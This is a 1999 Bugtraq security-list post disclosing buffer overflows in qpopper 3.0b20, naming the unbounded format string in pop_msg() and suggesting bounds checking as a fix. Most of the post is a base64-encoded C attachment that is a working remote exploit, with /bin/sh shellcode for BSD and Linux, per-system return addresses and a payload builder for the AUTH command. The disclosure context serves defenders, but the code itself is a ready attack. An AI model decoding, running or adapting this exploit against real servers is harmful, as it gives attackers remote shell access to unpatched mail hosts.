[12785] in bugtraq
qpop3.0b20 and below - notes and exploit
daemon@ATHENA.MIT.EDU (Lucid Solutions)
Wed Dec 1 12:05:22 1999
Mime-Version: 1.0
Content-Type: MULTIPART/MIXED; BOUNDARY="2110849577-815205743-943993525=:26891"
Message-Id: <Pine.LNX.4.10.9911301500310.26891-200000@terra.nebula.org>
Date: Tue, 30 Nov 1999 15:25:25 -0500
Reply-To: Lucid Solutions <lucid@TERRA.NEBULA.ORG>
From: Lucid Solutions <lucid@TERRA.NEBULA.ORG>
X-To: BUGTRAQ@SECURITYFOCUS.COM, eudora-custserv@eudora.com
To: BUGTRAQ@SECURITYFOCUS.COM
This message is in MIME format. The first part should be readable text,
while the remaining parts are likely unreadable without MIME-aware tools.
Send mail to mime@docserver.cac.washington.edu for more info.
--2110849577-815205743-943993525=:26891
Content-Type: TEXT/PLAIN; charset=US-ASCII
I found this overflow myself earlier this month. Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vunlnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.
There is also another overflow besides the AUTH overflow which can
occur if a valid username and password are first entered also occuring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
pop_msg(p,POP_FAILURE,
"Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);
No bounds checking is done on the attempted subcommand. It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
pop_msg(p,POP_FAILURE,
"Unknown command: \"%.128s %.128s\".",p->pop_command,
p->pop_subcommand);
I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.
As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (althought that's good practice too).
Attached is my original exploit that works on *BSD and Linux. (Solaris is
NOT vulnerable to the AUTH overflow). Slight modification is needed on
one line as the comments say. This exploit will actually work on the
majority of machines then. Qualcomm: you have already received my working
exploit with no modification needed.
Let's hope for an official patch soon.
- sk8@lucid-solutions.com
http://www.lucid-solutions.com
--2110849577-815205743-943993525=:26891
Content-Type: TEXT/PLAIN; charset=US-ASCII; name="q3combo-public.c"
Content-Transfer-Encoding: BASE64
Content-ID: <Pine.LNX.4.10.9911301525250.26891@terra.nebula.org>
Content-Description:
Content-Disposition: attachment; filename="q3combo-public.c"
LyogUVBPUCB2ZXJzaW9uIDMuMGIyMCBhbmQgbG93ZXIgYmV0YSB2ZXJzaW9u
cyBSRU1PVEUgRVhQTE9JVA0KICogY29tYmluYXRpb24gKkJTRCBhbmQgTGlu
dXgNCiAqDQogKiBzazhAbHVjaWQtc29sdXRpb25zLmNvbQ0KICogaHR0cDov
L3d3dy5sdWNpZC1zb2x1dGlvbnMuY29tDQogKg0KICogSSBoYXZlIHdyaXR0
ZW4gdGhpcyB0byB0ZXN0IGFuZCBkZW1vbnN0cmF0ZSB2dWxuZXJhYmlsaXRp
ZXMgb24gY2xpZW50cycgDQogKiBzeXN0ZW1zIG9ubHkuICANCiAqDQogKiAh
ISEhISEhISEhRE8gTk9UIGRpc3RyaWJ1dGUhISEhISEhISEhDQogKiAoYXQg
bGVhc3Qgbm90IHVudGlsIFF1YWxjb21tIGlzc3VlcyBhIHBhdGNoKQ0KICog
DQogKiBZb3UgbWF5IG9ubHkgdXNlIHRoaXMgdG8gdGVzdCB5b3VyIG93biBz
eXN0ZW0ocykuDQogKiBJIGFtIG5vdCByZXNwb25zaWJsZSBmb3IgYW55IHVu
YXV0aG9yaXplZCB1c2Ugb2YgdGhpcyBwcm9ncmFtLg0KICoNCiAqIHRlc3Rl
ZCBvbiBCU0RJIDMuMC80LjAuMSwgRnJlZUJTRCAyLjIuOC8zLjMsIExpbnV4
IA0KICogDQogKiBTaW5jZSBwb3BwZXIgaXMgdXN1YWxseSBjb21waWxlZCBi
eSB0aGUgYWRtaW4sIHJldHVybiBhZGRyZXNzZXMgd2lsbCB2YXJ5LA0KICog
YnV0IEkgaGF2ZSBpbmNsdWRlZCBjb21tb24gdmFsdWVzLiAgWW91IG1heSBo
YXZlIHRvIHByb3ZpZGUgYW4gb2Zmc2V0DQogKiB0byBnZXQgaXQgdG8gd29y
ayBvbiB5b3VyIHN5c3RlbS4NCiAqIA0KICogSSB3cm90ZSB0aGUgZXhwbG9p
dCBuZWFyIHRoZSBiZWdpbm5pbmcgb2YgTm92ZW1iZXIgMTk5OSwgYW5kIHVu
bGlrZSBzb21lIA0KICogb3RoZXIgZXhwbG9pdHMgSSd2ZSBzZWVuIHNpbmNl
LCB0aGlzIG9uZSB3b3JrcyBldmVuIG9uIExpbnV4IGJveGVzIG9uIHdoaWNo
IA0KICogaW5ldGQgd2FzIG5vdCBzdGFydGVkIGZyb20gYSBzaGVsbCBwcm9t
cHQuDQogKg0KICogT25lIG1pbm9yIGNoYW5nZSBtdXN0IGJlIG1hZGUgZm9y
IHRoaXMgdG8gZXhwbG9pdCB0aGUgQVVUSCBvdmVyZmxvdy4NCiAqDQogKiBV
c2FnZTogSWYgeW91IGNhbid0IGZpZ3VyZSBvdXQgaG93IHRvIHVzZSB0aGlz
LCB5b3Ugc2hvdWxkbid0DQogKiAJICBiZSBpbiB0aGUgc2VjdXJpdHkgYnVz
aW5lc3MuICAodHJ5IG5ldGNhdCkNCiAqLw0KDQojaW5jbHVkZSA8c3RkaW8u
aD4NCiNpbmNsdWRlIDxzdGRsaWIuaD4NCiNpbmNsdWRlIDxzeXMvdGltZS5o
Pg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5o
Pg0KI2luY2x1ZGUgPHN5cy9zb2NrZXQuaD4NCiNpbmNsdWRlIDxuZXRpbmV0
L2luLmg+DQojaW5jbHVkZSA8bmV0ZGIuaD4NCg0KdW5zaWduZWQgaW50IE5P
UD0weDkwOw0KDQp1bnNpZ25lZCBsb25nIG9mZnNldD0wOyAvKiBkZWZhdWx0
IG9mZnNldCAqLw0KDQpjaGFyIGJzZHNjW109DQoJIlx4ZWJceDMyXHg1ZVx4
MzFceGRiXHg4OVx4NWVceDA3XHg4OVx4NWVceDEyXHg4OVx4NWVceDE3Ig0K
CSJceDg4XHg1ZVx4MWNceDhkXHgxZVx4ODlceDVlXHgwZVx4MzFceGMwXHhi
MFx4M2JceDhkXHg3ZSINCgkiXHgwZVx4ODlceGZhXHg4OVx4ZjlceGJmXHgx
MFx4MTBceDEwXHgxMFx4MjlceDdlXHhmNVx4ODkiDQoJIlx4Y2ZceGViXHgw
MVx4ZmZceDYyXHg2MVx4NjNceDYwXHhlYlx4MWJceGU4XHhjOVx4ZmZceGZm
Ig0KCSJceGZmL2Jpbi9zaFx4YWFceGFhXHhhYVx4YWFceGZmXHhmZlx4ZmZc
eGJiXHhiYlx4YmJceGJiIg0KCSJceGNjXHhjY1x4Y2NceGNjXHg5YVx4YWFc
eGFhXHhhYVx4YWFceDA3XHhhYSI7DQoNCmNoYXIgbGludXhzY1tdPQ0KCSJc
eGViXHgyMlx4NWVceDg5XHhmM1x4ODlceGY3XHg4M1x4YzdceDA3XHgzMVx4
YzBceGFhIg0KCSJceDg5XHhmOVx4ODlceGYwXHhhYlx4ODlceGZhXHgzMVx4
YzBceGFiXHhiMFx4MDhceDA0Ig0KCSJceDAzXHhjZFx4ODBceDMxXHhkYlx4
ODlceGQ4XHg0MFx4Y2RceDgwXHhlOFx4ZDlceGZmIg0KCSJceGZmXHhmZi9i
aW4vc2giOw0KDQpzdHJ1Y3QgdmVyc2lvbiB7DQoJaW50IG51bTsNCgljaGFy
KiBzeXN0eXBlOw0KCWludCBidWZmZXJfbGVuZ3RoOw0KCWxvbmcgYWRkcmVz
czsNCn07DQoNCnN0cnVjdCB2ZXJzaW9uIHZlcmxpc3RbXSA9IHsNCgl7MCwg
IkJTREkgMi54LzMueCwgRnJlZUJTRCAyLngiLCAxMDAxLCAweGVmYmZkNTZj
fSwNCgl7MSwgIkJTREkgNC54IiwgMTAwMSwgMHg4MDQ3NTY0fSwNCgl7Miwg
IkZyZWVCU0QgMy54IiwgMTAwMSwgMHhiZmJmZDNkY30sDQoJezMsICJMaW51
eCIsIDk5MCwgMHhiZmZmZDMwNH0sDQoJezAsIDAsIDAsIDB9DQp9Ow0KDQpp
bnQgbWFpbihpbnQgYXJnYywgY2hhcioqIGFyZ3YpIHsNCgljaGFyKiBidWZm
ZXIsICpzaGVsbGNvZGU7DQoJaW50IGJ1ZmxlbiwgaT0wLCB2ZXIsIHJldGFk
ZHIsIGFsaWduPTA7DQoJc3RydWN0IHNvY2thZGRyX2luIHNvY2thZGRyOw0K
CXN0cnVjdCBob3N0ZW50KiBob3N0Ow0KDQoJaWYgKGFyZ2MgPCAyKSB7DQoJ
CXByaW50ZigiVXNhZ2U6ICVzIHZlcnNpb24gW29mZnNldF1cbiIsIGFyZ3Zb
MF0pOw0KCQlpPS0xOw0KCQlwcmludGYoIlxuQXZhaWxhYmxlIHZlcnNpb25z
OlxuIik7DQoJCXdoaWxlICh2ZXJsaXN0WysraV0uc3lzdHlwZSkgIHsNCgkJ
ICBwcmludGYoIiAgICVkOiAlc1xuIiwgdmVybGlzdFtpXS5udW0sIHZlcmxp
c3RbaV0uc3lzdHlwZSk7DQoJCX0NCgkJcHJpbnRmKCJcbiIpOw0KCQlleGl0
KC0xKTsNCgl9DQoNCgl2ZXI9YXRvaShhcmd2WzFdKTsNCglpZiAoYXJnYyA+
IDIpIHsNCgkJb2Zmc2V0PWF0b2koYXJndlsyXSk7DQoJfQ0KCWlmIChzdHJz
dHIodmVybGlzdFt2ZXJdLnN5c3R5cGUsICJMaW51eCIpKSB7DQoJCXNoZWxs
Y29kZT1saW51eHNjOw0KCQlhbGlnbj0yOw0KCX0NCgllbHNlIHNoZWxsY29k
ZT1ic2RzYzsNCg0KCWJ1Zmxlbj12ZXJsaXN0W3Zlcl0uYnVmZmVyX2xlbmd0
aDsNCglyZXRhZGRyPXZlcmxpc3RbdmVyXS5hZGRyZXNzOw0KDQoJYnVmZmVy
PShjaGFyKiltYWxsb2MoYnVmbGVuKTsNCgltZW1zZXQoYnVmZmVyLCBOT1As
IGJ1Zmxlbik7IA0KCW1lbWNweShidWZmZXIsICJBVVRIICIsIDQpOw0KCW1l
bWNweShidWZmZXIrODAwLCBzaGVsbGNvZGUsIHN0cmxlbihzaGVsbGNvZGUp
KTsNCglmb3IgKGk9ODAwK3N0cmxlbihzaGVsbGNvZGUpK2FsaWduOyBpPCBi
dWZsZW4tNDsgaSs9NCkgew0KCQkqKCh1bnNpZ25lZCBsb25nIGludCAqKSZi
dWZmZXJbaV0pPXJldGFkZHIrb2Zmc2V0Ow0KCX0NCglidWZmZXJbYnVmbGVu
LTJdPSdcbic7DQoJYnVmZmVyW2J1Zmxlbi0xXT0nXG4nOw0KDQoJcHJpbnRm
KCIlc1xuIiwgYnVmZmVyKTsNCn0NCg==
--2110849577-815205743-943993525=:26891--
